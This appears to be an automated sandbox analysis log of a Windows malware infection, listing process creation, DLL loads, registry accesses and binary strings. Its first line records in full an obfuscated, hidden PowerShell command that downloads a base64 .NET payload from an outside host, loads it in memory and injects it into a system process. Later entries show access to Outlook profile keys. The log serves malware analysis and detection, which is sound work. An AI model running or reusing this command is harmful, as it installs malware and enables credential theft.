Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ((('h'+'Rfu'+'rl = h3khttps:'+'//'+'ra'+'w.'+'githu'+'bu'+'ser'+'conten'+'t.com'+'/No'+'DetectO'+'n/NoDetectOn/refs/heads/main/De'+'tahNoth-'+'V.txth3k; hR'+'fb'+'ase64'+'Content ='+' (Ne'+'w-Object Syste'+'m.N'+'et.Web'+'Client).DownloadStr'+'ing'+'(hR'+'furl); hR'+'fbinar'+'yC'+'ontent = [S'+'y'+'stem.Conver'+'t]:'+':FromBa'+'s'+'e64Str'+'ing(h'+'Rfb'+'a'+'s'+'e64Co'+'ntent'+')'+'; h'+'Rfa'+'ss'+'embly = [Refle'+'ction'+'.Assembly'+']::Load(hRfbinaryContent); [d'+'nlib'+'.IO.Home]::VAI('+'Cut0/O'+'1FKS/d/ee.etsap'+'//:sptth'+'Cut, Cu'+'td'+'esativadoCut,'+' '+'Cu'+'tdesativadoCut, '+'Cutde'+'sativadoCut, Cutd'+'es'+'at'+'iva'+'do'+'Cut,'+' C'+'ut1C'+'ut, CutappidtelCut)') -cREplAcE'Cut',[cHAR]34 -REpLACe ([cHAR]104+[cHAR]82+[cHAR]102),[cHAR]36 -REpLACe([cHAR]104+[cHAR]51+[cHAR]107),[cHAR]39))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: scecli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: osuninst.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\convert.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
